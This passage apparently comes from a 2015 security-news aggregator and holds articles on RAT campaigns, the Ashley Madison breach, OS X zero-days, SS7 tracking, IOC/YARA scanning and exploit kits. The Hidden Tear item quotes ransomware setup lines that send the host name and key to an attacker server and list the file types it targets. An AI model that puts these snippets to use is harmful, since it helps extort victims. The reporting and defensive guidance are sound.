downloaded from the archive that included antianalysis checks, payload decryption, malware installation and persistence mechanisms. The script also installed either the Cybergate RAT, NanoCore RAT, or the Parite worm. The RATs were used against a small number of organizations, Chiu said. The large AutoIt script would likely evade antivirus or intrusion detection systems that have file-size limits. Chiu said too that it looks for a particular antivirus installation and if detected, it sleeps for a defined period of time before executing. Once it does execute, it tries to disable Windows User Access Control (UAC) in order to establish persistence on the machine and continue decrypting its payload. “Adversaries are using legitimate freeware to fly under the radar,” Chiu said. “It can hide as white noice because it appears as a management task.” Chiu said it’s unknown whether the targeted organizations already were using AutoIt in their environments. As for the RATs, NanoCore was spotted in attacks against energy companies in Asia and the Middle East before earlier this year, source code for the RAT and its premium plugins was leaked online making it widely accessible. Cybergate, meanwhile, has been available for years online and is considered easy to setup and use. In January, Microsoft warned companies of a spike in macro-enabled malware. It said in December attacks peaked at fewer than 8,000 a day for a short time. Like the current campaign spotted by Cisco, victims were enticed to enable macros and were ultimately infected by either the Ardnel or Tarbir downloader that grabbed any variety of malware from there.

Ashley Madison Hacker – An Insider Woman Employee?
26.8.2015

Ashley Madison Hack – An Insider Woman Employee?
"Ashley Madison was not hacked!"
This is what declared by John McAfee, former founder of antivirus software company McAfee.
So far everyone must be aware of Ashley Madison massive data breach. Last week, the hackers, who called themselves Impact Team, posted 10GB of personal data for tens of Millions of its customers, including their names and email addresses.
Frequently followed by another leak, where hackers released another 20GB of company's internal data, including personal emails from the CEO of Ashley Madison parent company Avid Life, Noel Biderman, along with the source code for its website and mobile apps.
John McAfee: Ashley Madison is an Inside Job by a Woman
However, in a post published in the International Business Times, McAfee made a controversial statement saying, "Ashley Madison was not hacked," and claiming that the alleged data breach was "an inside job."
McAfee says Ashley Madison was data was plundered by an ex-employee. A female ex-employee who worked for Toronto-based Avid Life Media, the parent company of the adultery website Ashley Madison.
The reason, no doubt, sounds good enough, but I wonder where he get this idea from. Snowden?
Conclusions by McAfee
McAfee claims that he discovered this by pouring over the 40-gigabytes of hacked database leaked so far by the alleged hacking group, which calls itself the Impact Team.
Data analysis has led him to draw three conclusions:
The hack was a solo affair
The breach was perpetrated by an insider
A woman is behind it
Evidences by McAfee to Prove his Conclusions
To prove his first claim that the hack was a solo affair, McAfee provided the details in his July post on IBTimes. He wrote, "I cannot tell you how I know, but the simple published data should help point to this fact."
Here's what he says for his conclusion that the hack was perpetrated by an insider:
How did I discover that it was an inside job?
From the [leaked data], it was clear that the perpetrator had intimate knowledge of the technology stack of the company...The data contains actual MySQL database dumps. [It] is not just someone copying a table and making into a .csv file. Hackers rarely have full knowledge of the technology stack of a target.
Now at last, Why a Woman?
McAfee says the attacker used the words like "scumbags" and "cheating dirtbags" when referring to men, and her mentioning of someone who "spitefully" joined Ashley Madison the day after Valentine's Day, as decidedly feminine.
"If this does not convince you then you need to get out of the house more often," McAfee says.
Wait what? Is he saying me to get out?
Okay, that is an understatement.
Ashley Madison Hack – An Insider Woman Employee?
Well, we know McAfee is a bit of a character in the cyber security world. He always remains in controversies, like for murdering his neighbor, for claiming to be the target of assassins or for being arrested for driving while under the influence.
However, on the other side, McAfee is a well-established name in cyber security, an innovator who made Millions through an anti-virus software company named after him.
For the hacker(s) part, Avid Life Media is offering a cash reward of up to $500,000 for information leading to the arrest of the hackers who breached the data of Ashley Madison.
Well, The Hacker News lets you draw your own conclusions. So let us know your thoughts about the reasons given by John McAfee. Hit the comments below.

Meet Linux's New Fastest File-System – Bcachefs
24.8.2015

First announced over five years ago, ex-Google engineer Kent Overstreet is pleasured in announcing the general availability of a new open-source file-system for Linux, called the Bcache File System (or Bcachefs).
Bcachefs is a Linux kernel block layer cache that aims at offering a speedier and more advanced way of storing data on servers.
Bcachefs promises to provide the same performance and reliability as the consecrated EXT4 and XFS file systems while having features of the ZFS and Btrfs file systems.
Features that Bcachefs Supports
Bcachefs supports all the features of a modern file-system, including:
Checksumming to ensure data integrity
Compression to save space
Caching for quick response
Copy-on-Write (COW) that offers the ability for a single file to be accessed by multiple parties at once
What's coming next for Bcachefs
It seems that some of the features in Bcachefs are limited or missing, which includes:
Snapshots
Erasure coding
Writeback caching between tiers
Native support for SMR (Shingled Magnetic Recording) drives and raw flash
However, in the future, Bcachefs will support all the advanced features, including Snapshots that allow the operating system to automatically make backups of data.
So far, The Bcachefs on-disk format has not been finalized, and the code is not ready for the Linux kernel.
The initial performance results are okay and "It probably won't eat your data – but no promises," Overstreet said in an e-mail to the Linux Kernel Mailing List late Thursday.
For trying out Bcachefs for yourself, you can grab the code from here. But, do not expect 'completed' code anytime soon, as Overstreet warns that "Bcachefs won't be done in a month (or a year)." So we recommend you to wait a little longer.
For more details about Bcachefs and its current limitations, you can go here to read its official announcement.

Script Kiddies can Now Create their Own Ransomware using This Kit
24.8.2015
Ransomware-creator-toolkit
Don't panic! You heard it right.
A Turkish security researcher named Utku Sen has posted a fully functional Ransomware code on open source code sharing website GitHub.
The Ransomware dubbed Hidden Tear, uses AES Encryption to lock down files before displaying a ransom message warning to get users to pay up.
The currently undetectable version of ransomware can be modified and implemented accordingly, as it contains every feature a cybercriminal can expect from modern malware.
Sen describes his Ransomware as "a ransomware-like file crypter sample which can be modified for specific purposes." This means even script kiddies can now develop their own Ransomware to threaten people.
The Hidden Tear — Free Ransomware Kit
The "Hidden Tear" Ransomware package consists of four files namely:
Hidden-Tear-Decrypter
Hidden-Tear
.gitignore
README.md
Hidden Tear Ransomware is capable of:
Using AES algorithm to encrypt files
Sending encryption key to a server
Encrypting files and decrypting them using a decrypter program with the encryption key
Creating a text file in Desktop with given message
Small file size (12 KB)
Evading detection by all standard anti-virus programs
How to Setup your Custom Ransomware Using Hidden Tear?
Sen has specified usage details as well, he says:
1. You need to have a web server that supports scripting languages such as PHP or Python. Then change the below-mentioned line with your URL. (Better use HTTPS connection in order to avoid eavesdropping):
string targetURL = "https://www.example.com/hidden-tear/write.php?info=";
2. The script should write the GET parameter to a text file. Sending process running in SendPassword() function:
string info = computerName + "-" + userName + " " + password;
var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);
3. Target file extensions can also be change. Default list:
var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};
For Educational Purpose... REALLY!
Wait! Sen has something more to say, listening to which you might think...REALLY!!
With the whole project "Hidden Tear," there's an attached legal warning that says:
"While this may be helpful for some, there are significant risks. The 'Hidden Tear' may be used only for 'Educational Purposes.' Do not use it as a Ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent."
Somebody should ask him… Why instigating people to commit a crime? One could imagine such "Educational Purposes" as there's a big chance of Ransomware to pop up in recent attacks.
A visit to the Video Demonstration of the sandbox testing of 'Hidden Tear' will give a real picture of what all it is capable of doing.
How to Protect Yourself from Ransomware Threat?
Two months ago, we introduced you a Free Ransomware Decryption and Malware Removal ToolKit that could help you deal with various variants of ransomware as well as help you unlock encrypted files without paying off to the cyber crooks.
However, there are some important steps that should be considered to protect yourself from Ransomware threats.
Always keep regular backups of your important data.
Make sure you run an active anti-virus security suite of tools on your system.
Do not open email attachments from unknown sources.
Most importantly, always browse the Internet safely.

RaspBSD – FreeBSD distribution for Raspberry Pi
24.8.2015

Raspberry Pi is gaining new heights by rapidly maturing as; after Microsoft made Windows 10 IoT core supporting the Raspberry Pi 2, now a new version FreeBSD operating system is also deployable on Raspberry Pi devices, called RaspBSD.
FreeBSD (Berkeley Software Distribution) is an open source Unix-like advanced computer operating system used to power modern servers, desktops and embedded systems.
Though FreeBSD-CURRENT has supported Raspberry Pi since November 2012 and Raspberry Pi 2 since March 2015, RaspBSD will support the Pi models B and B+.
As Raspberry Pi is a full fledged ARM system, FreeBSD/ARM is contributing to the list of the third-party operating system which support Raspberry Pi.
This is not an official release as yet, the FreeBSD developers have made an image (Beta version) available for the users to play around with the Operating System and give their feedback and suggestions for the issues they encounter.
RaspBSD Available For Download
A stable, more robust and bug free FreeBSD/ARM is expected to be introduced as the official OS for Pi by FreeBSD organisation at some point of time, says the Raspberry Pi's official blog.
Raspberry Pi is supported by the crochet build tool which is a tool for creating bootable FreeBSD images. Initially you will require an SD card of 4GB or more to ‘dd’ this image to:
Torrent - freebsd-pi-r245446.img.gz.torrent
Direct download - freebsd-pi-r245446.img.gz
SHA-1 - 65db3507b3c6f448d34068ca2a11f915d1b6b8f8
Default login - Username: root Password: freebsdarm
Alie Tan who developed the image describes FreeBSD/ARM features as:
Compiled with native FreeBSD GCC 4.2.1, tmps, 512MB swap partition with debug module off.
"Keep in mind that this image is based on FreeBSD10-CURRENT which is the 'bleeding edge' of FreeBSD development and not ready for production yet," Tan says.
As the new OS is not a stable release, the users may face some problems with network throughput, DMA, some packages not compile-able and High speed SD CARD issue to name some.
Download RaspBSD Now!
To tag along with FreeBSD/ARM, NetBSD operating system also released a testing image for Raspberry Pi.
This is indeed "The Power to serve," as the FreeBSD slogan says. You can download and play with the new OS from Raspbsd.org

Apple Mac OS X Hits by Two Unpatched Zero-day Flaws
24.8.2015
Apple Mac OS X Hits by Two Unpatched Zero-day Flaws
Few days after Apple patched the DYLD_PRINT_TO_FILE privilege-escalation vulnerability in OS X Yosemite, hackers have their hands on another zero-day bug in its operating system that allows hackers to gain root privileges to Mac computers.
Italian teenager Luca Todesco (@qwertyoruiop) has discovered two unknown zero-day vulnerabilities in Apple's Mac OS X operating system that could potentially be exploited to gain remote access to a Mac computer.
The 18-year-old self-described hacker has also posted details of his finding with source code for an exploit on the Github repository, as well as software to mitigate the vulnerability.
OS X Zero-Day Exploit in the Wild
The hacker's exploit makes use of two system flaws (which he dubbed 'tpwn') in order to cause a memory corruption in OS X's kernel.
Due to memory corruption, it's possible to circumvent the space layout randomization of the kernel address, therefore bypassing the toughest level of security meant to keep out attackers away.
The attacker then gains a root shell access to the Mac computer, allowing them to:
Install malicious programs
Create users
Delete users
Trash the system
Many more...
...even without the Mac owner's permission.
Todesco said he had reported the issue to Apple, but did not contact the company prior to the publication of the vulnerabilities.
Todesco faced criticism for contacting Apple only a few hours before publishing his findings online and not giving the company enough time to release a security fix.
No Way Out for Mac Users
The vulnerability affects Mac OS X version 10.9.5 through version 10.10.5, the latest official build of Apple's operating system.
Good news for Mac users who are running the latest beta of OS X El Capitan (also known as Mac OS X 10.11), as it appears that they aren't affected by the zero-day flaws.
Until Apple patches these critical flaws, you don't have any good options to prevent a skilled hacker from installing malware on your Mac computers, beyond using a third-party patch created by Todesco himself, called NullGuard.
However, installing a patch from a third party developer can be risky. Therefore, we advise you to thoroughly investigate the patch before installing, or it’s better to wait for an official patch certified by Apple.

Your GPS Location and Calls Can be Spied Using Network Vulnerability
24.8.2015
Your GPS Location and Calls Can be Spied Using Network Vulnerability
Yes, you heard it right. It's the dirty truth that’s featuring what is being called the largest privacy breach ever.
Billions of cell phone users are at risk of a vulnerability in the SS7 inter-carrier network that allows hackers and spies agencies to track locations and intercept all voice calls from anywhere in the world.
This is something we already know from the last year's Snowden leaks that explained the National Security Agency (NSA) capabilities to gather nearly 5 Billion records a day on mobile phone locations around the world.
But, it's worse than we have thought.
The famous Australian TV programme "60 Minutes" demonstrated that it is possible for anyone to track cell phone location and intercept calls and text messages.
This time, not due to a security vulnerability in the phone's operating system, but due to a serious flaw in the very system our cell phones use to communicate with each other around the world – The global signaling system, called SS7.
What went Wrong?
Hackers take advantage of the SS7, which is unfortunately vulnerable.
SS7 or Signaling System Number 7 is a protocol suite used by most telecommunications operators throughout the world to communicate with one another when directing calls, texts and Internet data.
SS7 allows cell phone carriers to collect location information from cell phone towers and share it with each other. This means a United States carrier will find its customer, no matter if he or she travels to any other country.
Location Tracking, Calls Listening, Messages Intercepting using SS7
Successful exploitation of the bug in SS7 could let attackers listen to all your voice calls as well as track your exact GPS location.
This technique is commonly known as a "Man-in-the-Middle" (MitM) attack, where hackers intercept online traffic and then forward it back to the recipient.
Besides tracking cell phone user and intercepting their calls, this critical flaw also allowed hackers to intercept SMS verification used with banking applications.
Really Scary!
Showing in a special report, 60 Minutes shows how German hackers intercepted and recorded a mobile phone conversation of a politician, as well as tracked his movements from Germany, which is situated thousands of miles away.
Since the SS7 network is used worldwide, the vulnerability in it puts Billions of cell phone users in danger.
Unfortunately, there isn't a fix yet, so the flaws in SS7 protocol will continue to be present even if your telephone carriers upgrade to more advanced technology.
Call Interception, Cellphone Hacking, GPS Location Tracking, Hacking News, Message Hack, Surveillance Tool, Tracking Cell Phone.

How To Use WhatsApp Web Client on iPhone and Other iOS Devices
24.8.2015
How To Use WhatsApp Web Client on iPhone and Other iOS Devices
WhatsApp Web client support is now available for iOS users.
That's right, now iOS users can access their instant messaging facility on the web; without taking the other route (via jailbreaking).
Eight months ago, on January 21, 2015, WhatsApp was made available on web browsers, and let Android, Windows Phone 8.0 and 8.1, Nokia S60, Nokia S40 Single SIM EVO, BlackBerry and BB10 smartphones enjoy the service.
However, there was no web solution for iOS users at that time because of limitations of the platform and high-security standards adopted by Apple, so they were forced to wait for the service.
However, iOS users' wait for WhatsApp Web is over now, and they can also enjoy WhatsApp Web – Same WhatsApp account on iPhone and desktops.
Yesterday, WhatsApp enabled its web client interface for iPhone users.
How to Use WhatsApp on iPhone and iOS Devices?
Interested WhatsApp users simply need to open Safari browser and navigate to http://web.whatsapp.com
A QR code will appear on the web page, which must be scanned with your iPhone using WhatsApp mobile application to activate the service.
By scanning the QR code that appears, users will automatically have paired their mobile WhatsApp with the WhatsApp Web client.

Due to the dependability of WhatsApp web client on Google Chrome browser, it could not be made active on iOS, as iOS supports Safari web browser.
This could be one of the reasons why WhatsApp took so much of time to bring its WhatsApp Web to Apple's iOS platform.
Now, WhatsApp Web can also be accessed using Safari browser, though it will require the latest version to run the facility.
Multiple Whatsapp Account, Whatsapp For Desktop, Whatsapp Update, Whatsapp Web, WhatsApp Web IOS

Indicators of compromise as a way to reduce risk
23.8.2015

Infrastructure owners must regularly check their resources for the presence of malicious components. One of the ways in which a resource may become infected is as a result of “zero-day” vulnerability exploitation by cybercriminals. In this case, the developers of security tools used to protect the information system may be as yet unaware of the new threat. At the same time, experts may be investigating incidents related to the new threat. Moreover, some findings of these investigations may already be publicly available.

Such reports have practical value. A typical report on an APT campaign includes the following information:

Attack victims and the objectives of cybercriminals;
List of victim nodes (IP addresses);
Current activity of malicious components and/or cybercriminal groups;
Detailed descriptions of tools and malicious components used by the cybercriminals;
Description of the command-and-control (C&C) server infrastructure;
Indicators of compromise.
Of all the detailed technical information on any given APT, “indicators of compromise” have the greatest practical value for security administrators. This is a set of data that can help an administrator of the corporate IT infrastructure to discover any malicious activity in the system and take appropriate action.

How should information system administrators use this data in practice? This paper is intended to provide an answer to this question.

An indicator of compromise is information on the signs of malicious activity, which is structured in such a way that it can be fed into automated tools designed to check the infrastructure for signs of infection. Although there is no generally accepted format for descriptions of these indicators, several types of structured data are widely used and supported in the industry.

IOC

IOC (indicator of compromise) – a list of threat data (e.g., strings defining file paths or registry keys) which can be used to detect a threat in the infrastructure using automated software-based analysis.

Simple IOC usage scenarios involve searching the system for specific files using a variety of search criteria: MD5 hashes, file names, creation dates, sizes and other attributes. Additionally, memory can be searched for various signs specific to the threat and the Windows registry can be searched for specific records.

This data can be presented in a variety of formats, one example of which is OpenIOC. The different formats enable the data to be imported into different security solutions to provide further processing of the indicators. An administrator can integrate IOCs taken from reports into such security solutions as:

Solutions of the Endpoint Security class
SIEM
IDS/IPS
HIDS/HIPS
Various incident investigation tools
There are many commercial solutions for working with IOC, but in many cases the capabilities of similar open-source programs are sufficient to check the target system for signs of infection. One example is Loki – an IOC scanner distributed under the GPL license, which can be used to search the target system for various indicators appearing as a result of malicious activity.

To scan the system using the Loki scanner, it is sufficient to unpack the archive containing the utility and add the relevant IOC attributes to the scanner’s knowledge base. The following IOC categories are located in the application’s folder named “signature”:

“filename-iocs” – a text file containing lists of file system attributes produced by the activity of various threats;
“hash-iocs” – a list of MD5, SHA1 and SHA256 hashes of malicious components that appear in the system after it is infected;
“falsepositive-hashes” – a list of exceptions: MD5, SHA1 and SHA256 hashes that are marked as false positives by the scanner when detecting the relevant components.
As an example, consider the report we released after an investigation of the Carbanak APT. Page 36 of the report lists the MD5 hashes of all malware components that may be present in the system as a result of this infection. We can open the scanner’s file named “hash-iocs” and enter a rule for this threat in the following format: <MD5>;<description> .

Indicators of compromise as a way to reduce risk

Indicators of compromise as a way to reduce risk

List of Carbanak APT components’ MD5 hashes in Loki scanner’s “hash-iocs” file

The next step is to create an indicator in the text file named “filename-iocs”, which describes malicious components’ attributes in the file system. The indicator should have the following format:

# COMMENT

# REGULAREXPRESSION;SCORE

Indicators of compromise as a way to reduce risk

Indicators of compromise as a way to reduce risk

IOC for the file system in Loki “filename-iocs” list

After entering the relevant indicators in the scanner’s knowledge base, we can launch a scan of the workstation. This requires launching the “loki.exe” executable file with administrator privileges (otherwise the scanner won’t be able to scan the contents of RAM for attributes) and wait for the scan to complete.

Indicators of compromise as a way to reduce risk

Indicators of compromise as a way to reduce risk

The process of scanning using Loki utility

Upon completing the scan, the application will generate a report and save it in the program’s folder under the name “loki.txt”.

YARA rules

In addition to the various IOC indicators, there are files with the “.yar” extension attached to some reports. These files contain rules for YARA – a tool for identifying and categorizing malicious samples. The so-called YARA rules use a special syntax to describe attributes that indicate the presence of malicious activity in the system. If one of the rules is met, the analyzer returns an infection verdict that includes the relevant details (e.g., the threat’s name).

Loki scanner described above also supports YARA rules, which means that administrators can use .yar files taken from reports to scan the system for the threats described in these reports. This is done by copying a .yar file to the “signature” folder and launching a scan.

However, the official tool created by developers of the YARA project is much better suited to working with YARA rules, because its knowledge base is regularly updated and is much more extensive than the databases of other similar utilities. As a result, scanning provides a more comprehensive view of an information system’s security, with more complete information on the presence of malicious components in the system.

To scan a workstation, it is sufficient to launch the YARA utility with the necessary parameters. For example:

yara32.exe –d md5= <MD5_hash><this_is_yara_rule.yar><dir_for_check>

where “-d” is a parameter used to define external variables. If any matches to any of the rules are detected, the utility will display a notification including the rule name and the component triggering the rule.

Indicators of compromise as a way to reduce risk

Indicators of compromise as a way to reduce risk

Sample notification of a YARA rule match

The administrator can, for example, launch such scans at system startup. This can be done by writing a simple PowerShell script that will launch utilities with the right parameters and, if necessary, schedule it to run on all hosts at logon using the Active Directory: User configuration -> Windows configuration -> Scenarios ->Logon.

STIX and JSON

Structured Threat Information Expression (STIX) is a unified language for recording threat information and importing it into software solutions. Many security solutions can import information in the STIX format (as well as JSON, which is described below) for using that information in the following kinds of infrastructure:

SIEM
Indicator-based security solutions (such as scanners)
Forensic platforms
Solutions of the Endpoint Security class, etc.
A STIX report can be imported into IBM QRadar, a popular SIEM solution, using a specially designed python script:

./stix_import.py -f STIXDocument.xml -i 192.168.56.2 -t XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX -r MyReferenceSet

where the “-f” parameter defines the location of a local STIX document, “-i” defines a host with a QRadar console installed on it, and “-t” defines a service token for QRadar.

STIX reports are also supported by the Splunk App for Enterprise Security intelligence platform and can be imported. A STIX file must have a .xml extension to be read and parsed.

It is worth noting that there is a Python utility called openioc-to-stix which can be used to convert OpenIOC format to STIX Indicators, enabling indicators of compromise to be imported as STIX rules into solutions that do not support OpenIOC.

JSON is one of the most popular data presentation formats, which is also often used to format data provided with reports. The use of JSON data depends on the administrator’s needs and on the software solution into which the data is imported. For example, if a JSON file contains IP addresses of command servers to which infected workstations connect, the administrator of the infrastructure protected by the solution can include these IPs in the blacklist of a firewall supporting JSON imports. If the firewall does not support importing data in this format, the administrator can use a parser (a JSON file analyzer) to export the IP list from the file and then import it into the firewall’s blacklist.

Conclusion

“Indicators of compromise” help to use threat data effectively: identify malware and quickly respond to incidents. These indicators are very often included in threat reports, which are often skimmed by readers. Even if a document providing details of a research project does not have a dedicated Indicators of Compromise section, a reader can always extract useful data (information on the attributes found in infected systems) from the text, present the data extracted in any of the formats described above and import it into a security solution.

Details Surface on Patched Sandbox Violation Vulnerability in iOS

21.8.2015

Apple patched an issue last week in iOS that could have allowed attackers to bypass the third-party app-sandbox protection mechanism on devices and read arbitrary managed preferences via a special app. The issue, which was present in versions of iOS prior to 8.4.1, stems from a vulnerability with both the sandbox_profiles and CFPreferences components of the operating system. Both are used when it comes to storing and retrieving preference keys and values on Apple devices. Apple Zero Day Remains Unpatched August 18, 2015 , 2:15 pm According to two CVEs filed for the vulnerability, Andreas Weinlein, a researcher with the security firm Appthority discovered the issue, nicknamed Quicksand, and reported it to Apple. The vulnerability affected devices that had mobile device management (MDM) software installed on it. MDM software is primarily used by IT departments to monitor and manage data, email and apps across multiple devices. Appthority warns however that when certain files, managed app configuration files, are pushed to devices via MDM a sandbox violation can occur. Assuming an attacker can wedge a line of code into running processes, they could call upon a library on the phone, /Library/Managed Preferences/mobile/, and access sensitive app configuration, and setting information. To carry out the attack an attacker would have to get the target to download a specialized app. “Once the app gets downloaded and installed on the devices, it would continuously monitor the directory for configuration settings being written to the world readable directory, harvesting and sending them to the attacker,” a blog entry published Wednesday about the vulnerability reads. Appthority claims its reached out to several MDM companies to tip them off about the vulnerability, and maintains that once an attacker gleans information such as credentials or details about the company’s managed device infrastructure, it could use those to access the services themselves. The firm goes on to caution in its blog that following a quick scan of apps “residing on enterprise managed devices” it found that nearly half of them (47 percent) discussed credentials, usernames, passwords and authentications, and that more than half (67 percent) referenced server identification information, statistics that suggest that no amount of sandboxing can prevent poorly kept data from being hacked. According to the security notes on iOS 8.4.1, which was pushed out last week, Apple claims it addressed the issue by improving the third-party sandbox profile. It was one of several bugs, along with fixes for Content Security Policy, WebKit, and cookie leakage. the Cupertino giant patched,

You’re Paying for Your Starbucks, One Way or the Other

21.8.2015
Today, I received this message from a friend living in Mexico via Whatsapp.

FullSizeRender

According to the message, Starbucks is giving away 500 in local currency credits if you take their survey, so my friend asked me to take a quick look to determine if it’s real.

Sadly for the coffee lovers among us, this is a classic hoax campaign abusing the Starbucks brand. If the victim follows the link from a mobile device, it loads a fake Starbucks survey with some scripts designed to customize the campaign according to the city of origin and its local currency.

st_v1

st_v2
st_v2

So if you live in the U.S. you’re promised $500 USD but if you’re in Argentina then it’s only 500 pesos and so on. Argentinians are clearly getting the worse end of that deal.

If you have the patience to click through the survey, the scammers have the gall to ask you to spread the message to 10 of your contacts in order to redeem your imaginary voucher. This is how this Hoax is spread –by enlisting the help of gullible victims to prey on their friends!

What if the victim uses a desktop browser? There is a script on the aforementioned site, which is actually located in Moldova, that detects the browser’s user agent. If it matches with a desktop version, the script redirects the visitor to the following URL:

hxxp://dpgoo.[***].com/258769f2-6910-4d0b-9db1-4d386c60c9d7

That URL in turn redirects visitors to another website for a Fake (Rogue) Technical Support service meant to scare the victim into providing remote access to their system.

Screen Shot 2015-08-19 at 3.19.02 PM

Screen Shot 2015-08-19 at 3.18.53 PM

It turns out that Google Hangouts calls to that number are prohibited. My first calling attempt met an automated answer of ‘This number is not in service’. However, on a second attempt with an alternate line I was able to connect to somebody with a foreign accent.

If you’re so inclined, you can listen to just how nice and attentive the ‘support staff’ is. Note the pauses and emotional inflection behind each scripted scene like ‘My name is…’ and when I revealed that my computer is infected: https://clyp.it/v2gjp3jq

As you can see, this is an all around ‘Hoax-Fraud-Rogue’ scheme with redundancies and low chance of failure. Victims themselves are enlisted to rekindle the campaigns flames by spreading the message to 10 new users. So, first things first, it’s very important to break the cycle, stop bombarding your friends with scams! Next, invite them to have a conversation about how hoaxes work, maybe over a cup of coffee you’ll actually have to pay for.

The rise of artificial intelligence technologies
20.8.2015

The advance of artificial intelligence (AI) technologies has caught the attention of companies and institutions in a wide range of enterprise markets, and executives in almost every industry are considering the potential impact AI will have on their operations, business models, and bottom lines.

AI technologies being evaluated and deployed are diverse, yet interrelated, and include areas like cognitive computing, machine learning, deep learning, predictive APIs, natural language processing, image recognition, and speech recognition.

A recent report from Tractica forecasts that, as enterprise AI deployments gather increasing momentum, cumulative revenue for the sector will total $43.5 billion worldwide during the period from 2015 through 2024. The market intelligence firm forecasts that the largest application markets for AI will be advertising and media, financial services, manufacturing, oil and gas, and retail.

All of these industries work with complex systems and large data sets where companies are finding strong ROI by deploying AI technologies.

“In almost every industry, including some very traditional ones, new approaches to age-old problems are being trialed using artificial intelligence,” says principal analyst Bruce Daley. “The business questions being addressed range from where to plant crops to how to detect fraud. The most highly affected industries are likely to be those with large amounts of data, where there are high rewards for making decisions quickly.”

Daley adds that such deployments are not always high-profile or visible on the surface – oftentimes, AI capabilities are embedded deeply in enterprise software systems and operational processes. In addition, Daley’s analysis indicates that many traditional businesses are likely to be disrupted by practical applications of AI. “One needs to look no further than the automotive industry to see how AI technology like Google’s self-driving cars has forced every serious player in the industry worldwide to consider strategies for including AI in their products.”

What is a secure OS?
20.8.2015

After the publication of our article on car hacking we received a number of questions regarding KasperskyOS. People who wrote to us made the valid point that there are several good and reliable operating systems on the market, designed, among other purposes, for the automotive industry. The main argument used to demonstrate the technological superiority of competing solutions was that the principle of security domain isolation is not a new idea and many of the existing systems that are currently in use have numerous additional security features based on the current needs, such as implementations of cryptographic protocols, network filters and protection against network attacks. Some of these systems are even certified to meet various security standards!

All these additional features (including certification) are of course important, but is it this functionality that makes an operating system reliable and secure? To answer this question, we first need to answer another: what is a secure OS? From our viewpoint, a secure operating system should guarantee secure or trusted execution of components that are not secure (programs).

Our concept has two very important aspects. One is obvious: we do not trust third-party software and consider it insecure and unreliable by definition. The other, not-so-obvious aspect: we should trust the operating system and regard kernel functionality as trusted. To increase the level of trust (after all, gentlemen do not always believe each other’s word), the kernel should undergo formal and mathematical verification (the subject of verification would merit a large research paper of its own).

Taking this paradigm as a starting point, we did not just implement a secure architecture based on a trusted kernel, but learned from existing secure OS implementations, as well. The fundamental principles, such as security domain separation and a microkernel are only half the story. Studying other systems and their limitations helps not only to avoid known problems but also to find new ways to implement security properties. As a result, we have developed an OS that, on the one hand, is similar in its operating principles to other operating systems but, on the other hand, has features which help to overcome known limitations and improve the security characteristics of the system on which the OS is running.

As an example of such improvement, I would like to mention interprocess communication (IPC) typification. This technology, the idea of which might seem quite obvious, provides us with low-level control of the data sent in application calls, giving security policies a granularity of control that has never been implemented at this level. Another feature is combining different types of security policies, such as Flow Control and Type Enforcement, in one system. The resulting policy is a mix of stateful and stateless policies, offering the best of both worlds. Naturally, the possibilities of combining policies are not limited to these two types. No commercial operating system can boast this flexibility. This functionality provides tight control of all interprocess communication, which is based not only on the knowledge of the subject and object of communication (who requests and from whom) but also on the knowledge of the high-level context of communication (what is requested, when and what data is transferred).

Other KasperskyOS features include a flexible language for defining security policies and a policy verification system, which makes both creating and debugging policies significantly easier. There are many other things, as well. The uniqueness of our work is supported by US and Russian patents.

As a result, we believe we have developed an operating system which implements the principle of trusted execution of untrusted applications. This was achieved, among other things, by using the principle of security domain separation and control of interprocess communication that is tight and flexible at the same time. This means that in the OS, modules can only interact by following a strictly defined protocol, enabling them to call only allowed functions in a strictly defined sequence. For customers, this means that even if there is a vulnerability in some module that can be exploited by a hacker (and we admit that this may be the case), the OS works in such a way that the hacker will only be able to gain control of the vulnerable module and will not be able to interfere with the operation of other modules, because all communications are controlled.

An operating system can be compared to a shield. All additional built-in security capabilities, including firewalls, secure data transfer protocols, even certification, are rivets on the shield. They certainly add reliability to the whole thing, but they do not define the overall level of protection. What is more important is the architecture, the principles underlying the OS. This determines whether the shield will be made of paper, plywood or steel. Many operating systems have great rivets – but what kind of shield are they attached to?

Actor using Angler exploit kit switched to Neutrino

20.8.2015

Introduction

I've often had a hard time finding compromised websites to kick off an infection chain for the Neutrino exploit kit (EK). During the past few months, we've usually seen Angler EK, Nuclear EK, or Rig EK instead. But the situation changed by Wednesday 2015-08-19. Earlier this week, we stopped finding as much Angler EK and started seeing a lot more traffic for Neutrino.

Our preliminary analysis indicates the actor behind a significant amount of Angler EK during recent months switched to Neutrino EK sometime this week. We don't have enough data to know if this change is permanent.

This diary presents our preliminary analysis, and it looks at current URL patterns for Neutrino EK. In this analysis, we examine changes in two infection chains kicked off by the same compromised website. The same site that led to Angler EK last week is now causing Neutrino EK.

Preliminary results

The first traffic example from Thursday 2015-08-13 has Angler EK. The second example from the same compromised website on Wednesday 2015-08-19 has Neutrino EK.

Similarities in the traffic indicate these were caused by the same actor. In this comparison, two notable similarities were found:

1) Pages from this compromised website had the same injected code, but the iframe changed from an Angler EK landing URL to Neutrino EK.

2) Each time, the payload was CryptoWall 3.0 using 1LY58fiaAYFKgev67TN1UJtRveJh81D2dU as the bitcoin address for ransom payment.

I noticed this in a few other compromised websites that led to Angler EK traffic last week. Most of them pointed to Neutrino when I checked within the past 24 hours.

Details

We used a compromised website named actionasia.com for this comparison.

EK traffic normally requires a referrer, and Google did not let us get to actionasia.com from its search results. I had to get at the compromised website from a Bing search. If Bing gives you a warning, it also gives you the option to proceed to the compromised site. Google will not.

On Thursday 2015-08-13, this website had injected code with an iframe leading to Angler EK [1]. Six days later on Wednesday 2015-08-19, this website showed the same pattern of injected code, but the iframe pointed to a URL for Neutrino EK. See the below images for comparison.

Shown above: Injected script with an iframe pointing to an Angler EK landing page.

Shown above: Same style of injected script 6 days later, this time pointing to Neutrino EK.

Post infection traffic in both cases reveals a CryptoWall 3.0 infection. When checking the decrypt instructions for the ransom payment, the more recent CryptoWall 3.0 sample from Neutrino EK used the same bitcoin address as the Angler EK payload on 2015-08-13. This is the same bitcoin address used by several CryptoWall 3.0 samples from Angler EK going back as early as 2015-07-01 [2].

Shown above: Bitcoin address from the CryptoWall 3.0 decrypt instructions on 2015-08-19 after the Neutrino EK infection.

Neutrino EK traffic

